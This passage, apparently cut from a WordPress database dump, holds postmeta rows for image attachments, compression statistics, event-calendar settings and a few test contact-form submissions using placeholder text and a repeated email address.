WP-Optimize'),(133728,263943,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:39591;s:12:\"smushed-size\";i:38128;s:15:\"savings-percent\";d:3.70000000000000017763568394002504646778106689453125;}'),(144938,265279,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:707;s:6:\"height\";i:315;s:4:\"file\";s:44:\"2021/08/ESC-OCT-2021-divine-creativity-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-1-300x134.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-1-474x315.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-1-300x315.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144937,265279,'_wp_attached_file','2021/08/ESC-OCT-2021-divine-creativity-1.jpg'),(144936,265277,'_source_url','https://images.unsplash.com/photo-1495704907664-81f74a7efd9b?ixlib=rb-0.3.5&q=80&fm=jpg&crop=entropy&cs=tinysrgb&w=950&h=400&fit=crop&s=d9b735620bb0c87b7bfff6de708d97a1&.png'),(144922,265274,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:279;s:6:\"height\";i:52;s:4:\"file\";s:30:\"2021/08/footer-8-12-2021-2.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"footer-8-12-2021-2-150x52.png\";s:5:\"width\";i:150;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144921,265274,'_wp_attached_file','2021/08/footer-8-12-2021-2.png'),(133794,263952,'protect_children',''),(133795,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133796,263952,'_EventOrigin','events-calendar'),(133797,263952,'protect_children',''),(133798,263952,'protect_children',''),(133799,263952,'protect_children',''),(133800,263952,'protect_children',''),(133801,263952,'protect_children',''),(133802,263952,'protect_children',''),(133803,263952,'protect_children',''),(133804,263952,'protect_children',''),(133805,263952,'protect_children',''),(133806,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133838,263952,'_EventCurrencyPosition','prefix'),(133807,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133837,263952,'_EventCurrencySymbol',''),(133808,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133836,263952,'_EventDuration','3600'),(133839,263952,'_EventCost',''),(133809,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133835,263952,'_EventEndDateUTC','2021-04-11 17:30:00'),(133810,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133834,263952,'_EventStartDateUTC','2021-04-11 16:30:00'),(133840,263952,'_EventURL',''),(133811,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133833,263952,'_EventEndDate','2021-04-11 11:30:00'),(133841,263952,'_EventTimezone','America/Denver'),(133812,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133832,263952,'_EventStartDate','2021-04-11 10:30:00'),(133842,263952,'_EventTimezoneAbbr','MDT'),(133813,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133831,263952,'_EventShowMap',''),(133843,263952,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(133814,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133830,263952,'_EventShowMapLink',''),(133844,263952,'_RTECregistrationsDisabled','0'),(133845,263952,'_RTECdeadlineType','start'),(133815,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133829,263952,'boldgrid_hide_page_title','0'),(133846,263952,'_RTECwhoCanRegister','any'),(133816,263952,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614266859;s:12:\"_EventOrigin\";i:1614266859;s:13:\"_thumbnail_id\";i:1615302243;s:24:\"boldgrid_hide_page_title\";i:1614266859;s:17:\"_EventShowMapLink\";i:1614266859;s:13:\"_EventShowMap\";i:1614266859;s:15:\"_EventStartDate\";i:1614267247;s:13:\"_EventEndDate\";i:1614267247;s:18:\"_EventStartDateUTC\";i:1614267247;s:16:\"_EventEndDateUTC\";i:1614267247;s:14:\"_EventDuration\";i:1614266859;s:20:\"_EventCurrencySymbol\";i:1614266859;s:22:\"_EventCurrencyPosition\";i:1614266859;s:10:\"_EventCost\";i:1614266859;s:9:\"_EventURL\";i:1614266859;s:14:\"_EventTimezone\";i:1614266859;s:18:\"_EventTimezoneAbbr\";i:1614267247;s:27:\"_EventNextPendingRecurrence\";i:1614266859;s:26:\"_RTECregistrationsDisabled\";i:1615803443;s:17:\"_RTECdeadlineType\";i:1614266859;s:19:\"_RTECwhoCanRegister\";i:1614266859;s:23:\"_RTEClimitRegistrations\";i:1614266859;s:21:\"_RTECmaxRegistrations\";i:1614266859;s:16:\"_EventRecurrence\";i:1614266859;s:18:\"_RTECnumRegistered\";i:1618136475;s:13:\"_EventVenueID\";i:1614266859;s:12:\"_dp_original\";i:1614266859;s:10:\"_edit_last\";i:1614266973;s:10:\"post_title\";i:1615803841;s:12:\"post_content\";i:1615803911;s:16:\"tribe_events_cat\";i:1615825510;s:11:\"post_status\";i:1614267247;}'),(133818,263952,'_EventOrigin','events-calendar'),(133819,263952,'_EventOrigin','events-calendar'),(133820,263952,'_EventOrigin','events-calendar'),(133821,263952,'_EventOrigin','events-calendar'),(133822,263952,'_EventOrigin','events-calendar'),(133823,263952,'_EventOrigin','events-calendar'),(133824,263952,'_EventOrigin','events-calendar'),(133825,263952,'_EventOrigin','events-calendar'),(133826,263952,'_EventOrigin','events-calendar'),(133827,263952,'_EventOrigin','events-calendar'),(133817,263952,'_EventOrigin','events-calendar'),(133847,263952,'_RTEClimitRegistrations','0'),(133848,263952,'_RTECmaxRegistrations','30'),(133849,263952,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(133850,263952,'_RTECnumRegistered','11'),(133851,263952,'_EventVenueID','262435'),(133853,263952,'_dp_original','263641'),(133854,263952,'_edit_lock','1616090343:2'),(133855,263952,'_edit_last','2'),(133856,263953,'_wp_attached_file','2021/02/snowmtn-eagle.jpg'),(133857,263953,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:538;s:6:\"height\";i:302;s:4:\"file\";s:25:\"2021/02/snowmtn-eagle.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"snowmtn-eagle-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"snowmtn-eagle-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"snowmtn-eagle-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(133871,263953,'original-file','2021/02/snowmtn-eagle-updraft-pre-smush-original.jpg'),(133872,263953,'smush-complete','1'),(133873,263953,'smush-info','The file was compressed from 30.92 KB to 29.93 KB saving 3.19 percent using WP-Optimize'),(133874,263953,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:31662;s:12:\"smushed-size\";i:30651;s:15:\"savings-percent\";d:3.189999999999999946709294817992486059665679931640625;}'),(144916,265269,'mec_moved_online_link',''),(144915,265269,'mec_cancelled_reason',''),(144914,265269,'mec_display_cancellation_reason_in_single_page',''),(144913,265269,'boldgrid_hide_page_title','0'),(144912,265269,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(144911,265269,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-08-23\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-08-23\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(144910,265269,'mec_currency','a:0:{}'),(144909,265269,'mec_additional_organizer_ids','a:0:{}'),(144908,265269,'mec_additional_location_ids','a:0:{}'),(144907,265269,'mec_cost',''),(144906,265269,'mec_more_info_target','_self'),(144905,265269,'mec_more_info_title',''),(144904,265269,'mec_organizer_id','1'),(144903,265269,'mec_read_more',''),(144902,265269,'mec_more_info',''),(144901,265269,'mec_repeat_type',''),(133914,263960,'protect_children',''),(133915,263960,'_field_6','Test'),(133916,263960,'_field_7','Testing'),(133917,263960,'_field_8','choll.03@comcast.net'),(133918,263960,'_field_9','(555) 555-5555'),(133919,263960,'_field_10','Denver'),(133920,263960,'_field_13','Initiator-Marcie Tucker'),(133921,263960,'_field_14','This is a test'),(133922,263960,'_form_id','2'),(133923,263960,'_seq_num','1'),(133924,263963,'protect_children',''),(133925,263963,'_field_43','Testing'),(133926,263963,'_field_44','Test'),(133927,263963,'_field_45','choll.03@comcast.net'),(133928,263963,'_field_46','(555) 555-5555'),(133929,263963,'_field_47','Northwest'),(133930,263963,'_field_50','Initiator-Larry Dixon'),(133931,263963,'_field_51','adsfadsfasdgajlsadgjalsdgjalsd'),(133932,263963,'_form_id','5'),(133933,263963,'_seq_num','12'),(133934,263964,'protect_children',''),(133935,263964,'_field_43','test2'),(133936,263964,'_field_44','test2'),(133937,263964,'_field_45','choll.03@comcast.net'),(133938,263964,'_field_46','(555) 555-5555'),(133939,263964,'_field_47','Boulder'),(133940,263964,'_field_50','Initiator-Larry Dixon'),(133941,263964,'_field_51','sfsfadsfas'),(133942,263964,'_form_id','5'),(133943,263964,'_seq_num','13'),(133944,263965,'protect_children',''),(133945,263965,'_field_43','adfad'),(133946,263965,'_field_44','fdshfhs'),(133947,263965,'_field_45','choll.03@comcast.net'),(133948,263965,'_field_46','(555) 555-5555'),(133949,263965,'_field_47','Loveland'),(133950,263965,'_field_50','Initiator-Larry Dixon'),(133951,263965,'_field_51','fdsdxvzxcbzfbxcb'),(133952,263965,'_form_id','5'),(133953,263965,'_seq_num','14'),(133954,263966,'protect_children',''),(133955,263966,'_field_43','zxcXZXCZ'),(133956,263966,'_field_44','CzXcX'),(133957,263966,'_field_45','choll.03@comcast.net'),(133958,263966,'_field_46','(555) 